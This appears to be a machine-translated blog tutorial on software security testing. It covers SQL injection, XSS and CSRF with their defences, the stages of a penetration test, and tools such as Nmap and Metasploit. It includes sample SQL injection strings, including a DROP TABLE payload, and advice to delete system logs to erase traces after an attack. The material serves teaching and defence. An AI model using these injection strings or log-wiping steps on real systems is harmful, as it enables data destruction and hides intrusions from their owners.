We talked about black-and-white box testing and performance testing , But what? , For a piece of software , Security testing is also very important . As the cover shows , The content is very attractive , Once the user clicks in , It's easy for them to perform unintended operations , Imagine the result …… be unbearable to contemplate . therefore , do Software security testing , It is very important to build a good software environment together .

In the following article , Will explain about Security testing in software testing . Let's study together ~

One 、 Safety test concept

1、 Security Testing Overview

Security testing is in IT In the life cycle of software products , In particular, product development is basically completed to the release stage , The process of product inspection to verify that the product meets the safety requirements definition and product quality standards .

2、 The relationship between security testing and software life cycle

Security testing runs through the whole life cycle of software . As shown in the figure below ：

3、 The difference between routine test and safety test

（1） Different test objectives

The general test is based on Find out Bug Target ;

The safety test is based on Find out the hidden danger Target .

（2） Different assumptions

The common test assumes that the data causing the problem is caused by the user's carelessness , Interfaces generally only consider The user interface ;

The security test assumes that the data causing the problem is deliberately constructed by the attacker , You need to consider All possible attack routes .

（3） Different thinking areas

The general test is based on Functions of the system For the thinking field ;

The thinking area of security testing includes not only the function of the system , There is also a systematic mechanism 、 The external environment 、 Application and data security risks and security attributes .

（4） Problem discovery patterns are different

The general test is based on Violation of function definition For the sake of judgment ;

The safety test is based on Violate the constraints of authority and ability For the sake of judgment .

Two 、 Basic principles of safety testing

1、 Cultivate the right way of thinking

Safety testers should have creative thinking , Creative thinking can help us stand in The angle of the attacker Think about all kinds of unexpected situations , At the same time, it can help us guess how developers develop , How to bypass the program protection logic , With Some unsafe behavior pattern Cause program failure .

2、 Test early and often

Security flaws and common Bug No difference , The earlier the discovery, the lower the repair cost , Do that , The first step is to train the development and test teams on common security issues in the early stage of software development , Teach them how to detect and fix security defects .

Although emerging Third party Library 、 Tools as well as programing language It can help developers design safer programs , But new threats are emerging , It is best for developers to be aware of the impact of new security vulnerabilities on the software being developed , The tester should Change the way of thinking , Test the application in every detail from the attacker's point of view , Make software more secure .

3、 Choose the right test tool

In many cases, security testing needs to simulate the behavior of hackers to attack the software system , To ensure that the software system has a solid defense capability . Simulating hacking requires security testers to be good at using various tools , Such as Vulnerability scanning tool 、 Front and back related tools to simulate data flow behavior 、 Packet grabber etc. .

Now there are many security scanners or application firewall tools on the market, which can automatically complete many daily security tasks , But these tools are not omnipotent . As a tester , We need to know exactly what these tools can do , What you can't do is very important , Never exaggerate or misuse test tools .

4、 Test the source code as much as possible

Use Source code scanning tool Code scan the software , One side Potential risks can be identified , Test the software from the inside , Improve the security of the code ; On the other hand It can also further improve the quality of the code . Black box penetration test and White box source code scanning Combination of inside and outside , The security of the software can be greatly improved .

5、 Documentation of test results

At the end of the test , It is wise and effective to record test actions and results clearly and accurately in file in , Produce a copy Test report , The report should preferably include Hole type 、 Security threats caused by the problem And severity 、 Testing techniques for finding problems 、 Repair of loopholes 、 Vulnerability risk etc. .

A good one Test report Should help developers Locate exactly Software security vulnerabilities , So as to effectively repair vulnerabilities , Make the software more secure and reliable .

3、 ... and 、 Common security vulnerabilities

1、SQL Inject

（1） Definition

So-called SQL To inject is to put SQL Command human input URL 、 Table fields 、 Or other dynamically generated SQL In the input parameters of the query statement , Finally, to cheat the server to execute malicious SQL command .

（2） Case study

Case study 1：

str SQL=“select * from users where (name=‘“+username+”’) and (pw=‘“+password+”’); ”
 Copy code 

str SQL=“select * from users where (name=‘1’ or ‘1’=‘1’) and
(pw=‘1’ or ‘1’=‘1’); ”
 Copy code 

Case study 2：

str SQL=“select * from users where (name=‘ Zhang San ’;DROP TABLE users;--)”
 Copy code 

Select *from users where name=‘ Zhang San ’;
DROP TABLE users
 Copy code 

（3） How to prevent SQL Inject

SQL Injection is The risk is very high Security vulnerability , We can modify the data entered by the user in the application Legitimacy test , Including user input data Type and length , meanwhile , Yes SQL Statement Special characters （ Like single quotes 、 Double quotes 、 Semicolons, etc ） Filter .

because SQL Inject the attack Web The application is in application layer , So most of them The firewall will not intercept . In addition to perfecting the application code , You can also perform defense on the database server side , Set permissions for the database server , Reduce Web Program access to the database , Revocation of unnecessary Public Licenses , Use powerful encryption technology to protect sensitive data and review and track the read sensitive data .

2、XSS Cross-site scripting attacks

（1）XSS name

XSS Put it all together Cross Site Scripting , Meaning for Cross site scripts , Its abbreviation was originally CSS , But this is related to HTML Cascading style sheets in （Cascading Style Sheets) The abbreviation has the same name , To distinguish, change the cross site script to XSS .

（2） Definition

XSS （Cross Site Scripting） yes Web One of the most common security vulnerabilities in application systems , It mainly comes from Web The application does not check and filter user input enough . Attackers can take advantage of XSS Loophole handle Malicious code Inject into the website , When a user visits the website , These malicious code will be executed , So as to achieve the purpose of attack .

（3）xss The attack process

First use a picture to demonstrate XSS Attack process of ：

XSS The attack process is as follows 4 A step ：

• An attacker entices a user to click on a link containing malicious code by email or other means , For example, an attacker passes through E-mail Send a website containing malicious code to users home.com .
• After the user clicks the link , The browser will execute the malicious code contained in the link without the user's knowledge .
• Connect users with home.com The interaction of cookie and session Wait for information to be sent to the attacker .
• After the attacker gets the data , Will pretend to be a user talking to a real website , Engage in illegal activities .

（4） How to defend

about XSS Loophole , The core defense measures It is to check and filter the user's input , Include URL 、 Search keywords 、 HTTP head 、 POST Data etc. , Only the specified length range is accepted 、 The format is appropriate 、 What is expected , Filter all other contents that do not meet expectations .

besides , Direction HTML When inserting untrusted data into a tag or attribute , These data should be encoded accordingly . Will be important cookie Marked as http only , such javascript Scripts cannot access this cookie , Avoid the use of attackers javascript Script get cookie .

3、CSRF Cross Station Request Forgery Attack

（1） Definition

CSRF （Cross-Site Request Forgery） by Cross-site request forgery , It is aimed at Web How the application attacks , The attacker took advantage of CSRF The vulnerability is disguised as Requests from trusted users , To access the attacked website .

（2） The attack process

Let's use a picture to illustrate CSRF Attack process of ：

（3） How to attack

stay CSRF In attack , When a user visits a trusted website , Without exiting the session , An attacker entices a user to click on a malicious website , Malicious websites will return attack codes , At the same time, it is required to visit trusted websites , In this way, the user unknowingly sends the code of the malicious website to the trusted website .

（4）CSRF and XSS The difference

XSS It is to steal user information and pretend to perform malicious activities as a user , and CSRF Attack the website through users .

If you will XSS The attack process is compared to the thief stealing the user's ID card to handle illegal business , be CSRF An attack is a liar “ hijacked ” Users , Let users handle illegal business by themselves , To achieve their own goals .

（5） How to prevent CSRF

CSRF The main reasons for the vulnerability are Lack of a more secure authentication mechanism for user requests , To guard against CSRF The main idea of the vulnerability is to strengthen the verification of users and user requests in the background , Not just cookie The identification of .

for example , Use http In the request header Referer Verify the identity of the website source , Add... Based on the current user identity token verification , Before requesting data submission , Verify the source of the user by filling in the verification code , Prevent unauthorized malicious operations .

（6）Referer

HTTP Referer Is part of the request header , representative The source of the web page （ The address on the previous page ）, When the browser to Web When the server sends the request , Usually with Referer , Tell the server from which page the visit is linked , The server can thus obtain some information for processing .

Four 、🩸 Penetration test

1、 Definition of penetration test

Penetration testing is a way to simulate hacker attacks , A method to evaluate the security performance of computer network system . This process is from the attacker's point of view of any weaknesses in the system 、 Active analysis of technical defects or loopholes , And take the initiative to exploit security vulnerabilities conditionally .

2、 Characteristics of penetration test

Penetration testing is a gradual and in-depth process .

Penetration test is a test conducted by selecting an attack method that does not affect the normal operation of the business system .

3、 The main steps of the penetration test process

The main steps of penetration test are shown in the figure below ：

4、 Penetration testing process

（1） Clear objectives

• determine Test requirements .
• Determine the penetration test required by the customer Range .
• Determine the penetration test The rules .

（2） To collect information

In the information collection stage, try to Collect all kinds of information about the project software , for example , For one Web Applications , To collect The script type 、 Server type 、 Database type as well as The framework used in the project 、 Open source software etc. . information gathering Very important for penetration testing , Only by mastering enough information about the target program , To better detect vulnerabilities .

There are two ways to collect information ：

Take the initiative to collect ： Through direct access 、 Scan websites and other ways to collect the information you want , This method can collect more information , But the visitor's behavior will be The target host Record .

Passive collection ： utilize Third party service Understand the goal , Such as searching for relevant information on the Internet . The information obtained in this way is relatively small and not direct enough , But the target host will not find the tester's behavior .

（3） Scan for leaks

At this stage , Comprehensive analysis of Information collected , With the help of a scanning tool Target program scan , Find existing Security vulnerabilities .

（4） Validation vulnerabilities

stay Vulnerability scanning phase , Testers will get a lot about the security vulnerabilities of the target program , But these vulnerabilities have false positives , It requires testers to combine the actual situation , build Simulation test environment Verify these security vulnerabilities . Only confirmed security vulnerabilities can be exploited to execute attacks .

（5） Analyzing information

Verified security vulnerabilities can be exploited to Target program attack , however Different security vulnerabilities , The attack mechanism is different , Different security vulnerabilities need further analysis , Include The principle of security holes 、 Available tools 、 Target program detection mechanism 、 Whether the attack can bypass the firewall etc. , Draw up a Detailed and sophisticated attack plan , This can ensure the smooth execution of the test .

（6） Penetration attack

Penetration attack is to Target program Launch a real attack , To achieve the purpose of testing , Such as obtaining the user account password 、 Intercept the data transmitted by the target program 、 Control the target host, etc . commonly Penetration testing is a one-time test , After the attack, you should Carry out cleaning work , Delete system log 、 Program logs, etc , Erase traces of entry into the system .

（7） Arrange information

After the penetration attack is completed , Sort out the information obtained by the attack , For the back Write test report Provide evidence .

（8） Write test report

After the test, you should Write test report , Describe the project safety test objectives 、 Information collection methods 、 Vulnerability scanning tools and vulnerability conditions 、 attack plan 、 Actual attack results 、 Problems encountered during the test, etc , Besides , still more Analyze the vulnerability of the target program , Provide safe and effective solutions .

5、 ... and 、️ Common security testing tools

1、Web Vulnerability scanning tool -AppScan

（1） Definition

AppScan yes IBM It's from the company Web Apply security testing tools , It uses black box testing , Can scan common web Application security holes .

（2）AppScan The scanning process

AppScan The scanning process of is ： Probe 、 test 、 scanning .

In the detection phase ,AppScan Link to the site by sending a request 、 Form, etc , Detect the potential safety hazards of the target program according to the response information , To determine the scope of security vulnerabilities .

In the test phase ,AppScan Attack potential security vulnerabilities . AppScan There is a built-in test strategy library , The test strategy library can generate the corresponding test input for the corresponding security risk detection rules , AppScan Use the generated test input to launch an attack on a security vulnerability .

In the scanning phase ,AppScan It will detect the response result of the target program to the attack , And determine whether the detected security vulnerability is a real security vulnerability according to the results , If it is a real security vulnerability, the risk level is determined according to its risk level , Provide a basis for developers to repair defects .

2、 Port scan tool -Nmap

（1） Definition

Nmap It's a Network connection port scanning tool , Used to scan the open network connection ports of computers on the Internet . Determine the port on which the service runs , And infer the operating system of the computer . It is one of the necessary tools for network administrators to evaluate network system security .

（2）Nmap Specific functions

Nmap The specific functions are as follows ：

• Host scan
• Port status scan
• Application version detection
• Operating system detection
• A firewall /IDS Evasion and deception
• Support test object interaction script

3、 Caught tools -Fiddler

（1） Definition

Fiddler It's a http Protocol debugging agent tool , It acts as an agent Web Working as a server , Help users record computers and Internet All... Passed between HTTP(HTTPS) Traffic .

As shown in the figure ：

（2）Fiddler The function of

Fiddler Sure Capture all traffic from locally running programs , So as to record server to server 、 Traffic from device to server . Besides , Fiddler It also supports a variety of filter , Filter out what users want Traffic data , Save a lot of time and energy . Compared with other packet capturing tools , Fiddler Small and easy to use , And the function is perfect , It supports archiving captured traffic data , For subsequent analysis .

4、Web Penetration testing tools -Metasploit

（1） Definition

Metasploit It's a Penetration testing platform , Can find 、 Validation vulnerabilities , And exploit vulnerabilities to carry out penetration attacks . It's a Open source project , Provide infrastructure 、 Content and tools to perform penetration testing and extensive security audits .

（2）Metasploit Specific functions

For penetration attacks , Metasploit Mainly provides The following function modules ：

Penetration module （exploit）： Run time will Exploit the target's security vulnerability The attack .

Attack load module （payload）： After a successful penetration of the goal , The test program starts running on the target computer . It can help users obtain the required access and action permissions on the target system .

Auxiliary modules （auxiliary）： It contains a series of Auxiliary support module , Include Scanning module 、 Vulnerability discovery module 、 Network protocol spoofing module .

Encoder module （encoder）： The encoder module is usually used to confuse the code of our attack module , Escape the detection of target security protection mechanism , Such as anti-virus software and firewall .

Meterpreter： Use Memory technology Attack payload of , Can be injected into the process . It can perform various functions on the target .

（3）Metasploit The role of

Metasploit It's a Multi user collaboration tools , Team members can share host data , View the collected evidence and create host notes to share knowledge about specific goals . Final , Metasploit It can help users identify the weakest point of the target , And prove that there are loopholes or security problems .

6、 ... and 、 Conclusion

For software testing , Except for the black and white box test 、 Beyond performance testing , Security testing is also particularly important . Once a web page has a vulnerability , It is easy for an attacker to let the victim perform unintended operations , This kind of scene is not what everyone wants to see . therefore , For Software , Do a good job in safety testing

That's all about security testing ！ If you don't understand or the article is wrong , Please leave a message in the comment area or send a private letter to me ！